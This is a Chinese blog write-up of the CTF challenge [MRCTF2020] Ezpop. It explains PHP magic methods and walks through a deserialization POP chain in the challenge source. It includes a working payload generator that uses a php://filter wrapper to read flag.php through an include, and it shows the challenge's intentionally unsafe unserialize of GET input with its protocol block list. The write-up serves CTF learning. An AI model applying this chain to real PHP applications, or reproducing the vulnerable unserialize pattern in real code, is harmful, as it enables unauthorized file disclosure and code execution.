php魔术方法利用构造pop链之[MRCTF2020]Ezpop

最新推荐文章于 2023-03-28 20:32:50 发布
最新推荐文章于 2023-03-28 20:32:50 发布
阅读量394 收藏 2
点赞数
分类专栏: CTF知识点 文章标签: php 开发语言 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126273248
版权

知识点 :
PHP魔术方发的自动触发条件:

__construct 当一个对象创建时被调用,
__toString 当一个对象被当作一个字符串被调用。
__wakeup() 使用unserialize时触发
__get() 用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性
__invoke() 当脚本尝试将对象调用为函数时触发

 基础基础知识:

什么是一个对象?什么是属性?

class show {

public $source;
public $str;


}

$a=new show();//这里 $a就是一个对象,而 $a->source 就是a 的一个属性 source;

题目代码解析:

<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {        //定义一个 Modifier类
    protected  $var;    //一个属性var
    public function append($value){     //定义一个方法append ,会传入一个参数value
        include($value);                //包含参数value value 如果是flag.php 应该就可以利用
    }
    public function __invoke(){         //_invoke()方法,当一个对象被当做函数(方法)使用时会自动触发它
        $this->append($this->var);        //调用append()方法,这里就可以想到把var 传入flag.php,再想办法触发_invoke;
    }
}

class Show{
    public $source;		
    public $str;
    public function __construct($file='index.php'){		//__construct方法,当一个对象创建时调用,这里默认为打开include.php
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){			//__toString方法,当一个对象被当做字符串使用时会自动触发
        return $this->str->source;			//返回str->source ,明显把str定义成一个对象;
    }

    public function __wakeup(){			//__wakeup ,当对象使用unserialize 时就会自动触发,与下面的想呼应;
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {    //对source 正则匹配;
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();       //将p属性定义为数组
    }

    public function __get($key){   //_GET 方法,当调用对象的属性不可达或者不存在时就会自动触发;
        $function = $this->p;		//将p赋值给function
        return $function();			//返回function方法!!可以用它触发invoke
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;      //	定义 a 对象,类型为show
    highlight_file(__FILE__);
}


从解析中就可以逆向思维构造pop链;

1.首先我们的目的是触发_invoke 方法,然后这个方法里面就会执行append方法执行文件包含var;我们就可以把var 设为flag.php 使用伪协议:

php://filter/read=convert.base64-encode/resource=flag.php

如果invoke 方法触发,那么就会得到flag;

2.怎么触发invoke呢?当将对象调用为函数使用时就会自动触发,看到代码里面的test类的get方法将属性返回为函数,//那么就可以将 p设置为一个对象;设置成

3.那么现在就要想办法触发get方法,这也是一个魔术方法,根据它的自动触发条件,就可以看到利用str->source ,本来str 和source是一个级别的属性,但是这里把source给了str,那么将str定为test类的一个对象,而test类里面没有source属性,所以就会自动触发get;

4.现在问题就到了怎么触发_tostring 方法呢,它如果将一个对象当字符串处理时就会自动触发,恰好wakeup里面的将source进行正则匹配后触发将source返回为字符串,如果source是一个对象,那么它就可以触发tostring;

5.所以现在触发wakeup,当有对象被反序列化时就触发,恰好,要传入的pop要unserialize;

所以:向pop传值→触发unserialize函数→触发__wakeup→触发对象当作字符串用→触发__toString→触发调用不可读取属性→触发__get→触发对象当作函数使用→触发__invoke→调用append,append里有include文件包含。

序列化代码:
 

<?php
 class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php"; 
 }
 class Show{
    public $source;
    public $str;
 }
 class Test{
    public $p;
 }
 $a=new Show;
 $a->source=new show;
 $a->source->str=new Test;
 $a->source->str->p=new Modifier;
 echo urlencode(serialize($a));

传入解密即可;

一只Traveler
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP中的常见魔术方法功能作用及用法实例
01-21
在面向对象编程中,PHP提供了一系列的魔术方法,这些魔术方法为编程提供了很多便利。PHP中的魔术方法通常以__(两个下划线)开始,并且不需要显示的调用而是由某种特定的条件出发。这篇文章简单总结了PHP中提供的魔术...
php教程之魔术方法的使用示例(php魔术函数)
10-26
PHP编程语言中,魔术方法是一组特殊的方法,它们在特定的情况下自动被调用,比如当尝试访问不存在的...在编写自定义类时,根据需要适当地利用魔术方法可以增强类的功能,同时也要注意避免与内置的魔术方法发生冲突。
魔术方法
yingmengyishengge的博客
03-31 67
1.魔术方法 __contruct:构造方法 __destruct:析构方法 __clone:克隆方法,对象被克隆时,自动调用 例1:class Human{ public $age=22; public function __clone(){ echo '有人克隆'; } } $lisi=new Human(); $zhangsan=clone $lis...
PHP反序列化pop构造
最新发布
Elite的博客
03-28 830
简单易懂的反序列化pop构造
php反序列化之pop构造
m0_62422842的博客
04-06 7456
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
PHP反序列化--简单ctf题--pop(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4420
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
[MRCTF2020]Ezpop --对pop构造的简单理解
StevenOnesir的博客
12-31 3154
  简单的序列化攻击是因为对魔术方法的自动调用而触发漏洞,但如果关键代码不在魔术方法,而是在一个类的普通方法中,则需要观察联系类与函数之间的关系,将其与魔术方法利用结合起来,这时候就可以利用pop构造与攻击。 首先题目界面直接给出了源码: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%
PHP魔术方法之__call与__callStatic使用方法
01-20
//魔术方法__call /* $method 获得方法名 $arg 获得方法的参数集合 */ class Human { private function t(){ } public function __call($method,$arg){ echo '你想调用我不存在的方法',$method,'方法 '; ...
PHP之十六个魔术方法详细介绍
12-19
PHP中把以两个下划线__开头的方法称为魔术方法(Magic methods),这些方法在PHP中充当了举足轻重的作用。 魔术方法包括: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不...
php反序列化pop一则
dengzhasong7076的博客
07-27 366
跟随wupco师傅学习 classes.php <?php class OutputFilter { protected $matchPattern; protected $replacement; function __construct($pattern, $repl) { $this->matchPattern = $pattern; $...
PHP反序列化&POP构造——2021第五空间CTF pklovecloud
iO快到碗里来
09-20 2665
网上关与PHP反序列化&POP构造的文章有很多,笔者在这里简要讲解一下其相关知识。 0x01 序列化和反序列化 为方便存储和传输对象,将对象转化为字符串的操作叫做序列化( serialize() ),将所转化的字符串恢复成对象的过程叫做反序列化( unserialize() )。 举个栗子: <?php Class test{ public $a= '1'; public $bb= 2; public $ccc= True; } $r= new test(); ec
ctf-pop
qq_32445755的博客
05-15 1873
POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可
反序列化漏洞详解
qq_48904485的博客
03-21 2766
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
由MRCTF学习php反序列化--pop构造
unexpectedthing的博客
09-09 729
文章目录前言魔法函数__toString()__invoke()__call()和__callStatic()pop一个简单的例子MRCTF-ezpop 前言 复现地址:BUUCTF平台 题目:MRCTF-ezpop 魔法函数 __construct():具有构造函数的类在创建新对象时,回调用此方法 __destruct():在对象所有引用都被删除或者对象被销毁时执行 __wakeup():使用unserialize()函数时调用 __sleep():使用serialize()函数时调用 __toStri
BUUCTF [MRCTF2020]Ezpop
qq_52671379的博客
04-01 255
BUUCTF [MRCTF2020]Ezpop
PHP之十六个魔术方法详解 转自:青叶
Landasika的博客
05-17 1871
目录 PHP之十六个魔术方法详解前言范例〇、__serialize() 和 __unserialize()一、 __construct(),类的构造函数二、__destruct(),类的析构函数三、 __call(),在对象中调用一个不可访问方法时调用。四、 __callStatic(),用静态方式中调用一个不可访问方法时调用五、 __get(),获得一个类的成员变量时调用六、 __s...
记一道ctf的反序列化POP构造
weixin_43263451的博客
10-16 1959
<?php class Tiger{ public $string; protected $var; public function __toString(){ return $this->string; } public function boss($value){ @eval($value); } public function __invoke(){ $this->boss(...
第六十一题——[MRCTF2020]Ezpop
分享简单的安全技术
05-08 684
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,显示出源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack
ctfshow web入门(SSTI)
m0_62422842的博客
06-18 1331
ctfshow的web入门中ssti题目的总结
php重要知识点总结(PHP网络开发必背).doc
12-21
php重要知识点总结(PHP网络开发必背).doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值